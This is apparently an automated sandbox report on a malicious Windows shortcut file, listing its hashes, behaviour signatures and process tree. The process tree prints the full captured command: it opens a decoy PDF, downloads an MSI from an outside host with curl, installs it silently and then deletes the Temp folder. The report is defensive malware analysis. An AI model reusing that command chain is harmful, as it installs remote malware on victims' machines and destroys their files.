Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    31-12-2024 08:43

General

  • Target

    c156c24ba8bbf168969b9acfa760f49b.lnk

  • Size

    3KB

  • MD5

    c156c24ba8bbf168969b9acfa760f49b

  • SHA1

    110d20232e070265c8b5ab808264c5e9613cede6

  • SHA256

    4b4bb2f618431b740a075df0972cd029be2418c1f1870d411ef4cf1e8779c97e

  • SHA512

    d2969b42c5a4e5e8ceff1d8961e75abd4b9172631765445ac61f87f20acffd55054b94f4d491e80c53c0423da26f72948672ba6b41d4e2793a8a9fd9899518c7

Score
7/10

Malware Config

Signatures

  • Deletes itself 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\c156c24ba8bbf168969b9acfa760f49b.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1344
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k start msedge https://unec.edu.az/application/uploads/2014/12/pdf-sample.pdf & curl -sLo C:\Users\Admin\AppData\Local\Temp\6ad5feeb-dcc3-4eef-baa3-4bcd42ce30b4.msi http://serverl.org/cords/install.msi & C:\Users\Admin\AppData\Local\Temp\6ad5feeb-dcc3-4eef-baa3-4bcd42ce30b4.msi /qn & del /q/f/s C:\Users\Admin\AppData\Local\Temp & exit
      2⤵
      • Deletes itself
      PID:2576

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2576-46-0x0000000002400000-0x0000000002401000-memory.dmp

    Filesize

    4KB